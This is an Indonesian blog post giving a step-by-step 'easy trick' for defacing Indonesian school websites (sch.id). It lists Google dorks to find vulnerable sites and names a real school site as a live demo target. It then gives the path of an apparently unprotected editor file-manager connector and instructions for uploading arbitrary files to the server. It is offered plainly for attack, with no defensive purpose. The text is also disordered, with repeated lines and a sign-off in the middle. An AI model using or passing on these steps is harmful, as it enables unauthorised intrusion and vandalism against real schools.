jumpa lagi dengan saya admin ganteng dan tampan yang terlahir tampan, kali ini saya akan memposting tengtang "Trik Mudah Deface Website Sekolah sch.id"
gimana sih caranya? kok di bilang mudah?
oke langusng aja yah ga usah lama-lama karena saya capek ngetiknya wkwkwkw
pertama siapin dulu perlatanya!
file.txt dari notepad (isinya terserah anda )
buka google terus masukin Dork (kata kunci) nih
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Setelah mendapatkan target langsung ke step selanjutnya, untuk live demo bisa disini
http://www.sman1krw.sch.id/
Exploit: /editor/filemanager/connectors/test.html
langsung saja di hajar ! masukin exploit tadi ke url web sch.id
Pada kolom Connector *ASP ubah menjadi *PHP terus kolom Resource Type ubah jadi *FILE
demikian trick dari saya, saya mohon undur diri dulu :D
lalu klik Browse (cari file .txt yang kamu buat tadi) > Upload
setelah berhasil di upload , kalian buka aja hasilnya
http://sitetarget.sch.id/userfiles/namafileanda.txt
atau => http://sitetarget.sch.id/userfiles/file/namafileanda.txt
http://sitetarget.sch.id/userfiles/namafileanda.txt
atau => http://sitetarget.sch.id/userfiles/file/namafileanda.txt
mudah bukan?
demikian trick dari saya, saya mohon undur diri dulu :D
salam dari admin ganteng terlahir tampan K4C3 Undetected
0 komentar:
Posting Komentar